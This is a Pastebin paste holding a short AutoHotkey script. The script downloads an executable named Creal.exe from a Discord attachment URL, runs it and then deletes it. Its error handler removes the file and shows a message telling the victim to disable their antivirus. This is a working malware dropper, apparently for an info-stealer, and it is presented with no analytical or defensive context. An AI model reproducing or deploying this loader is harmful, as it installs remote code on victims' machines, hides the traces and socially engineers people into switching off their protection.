Advertisement
newne3639

Untitled

Nov 18th, 2022
18
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. UrlDownloadToFile, https://cdn.discordapp.com/attachments/969612675392864306/1041996097951899739/Creal.exe, Creal.exe
  2. Sleep 5000
  3. OnError("LogError")
  4. cause := error
  5.  
  6. LogError(exception) {
  7. FileDelete, Creal.exe
  8. FileAppend % "Error on line " exception.Line ": " exception.Message "`n"
  9. , errorlog.txt
  10. MsgBox, You have your AntiVirus on!. Please disable it to run this program! Else try restarting your computer...
  11. return true
  12. }
  13. Run, Creal.exe
  14. Sleep 5000
  15. FileDelete, Creal.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement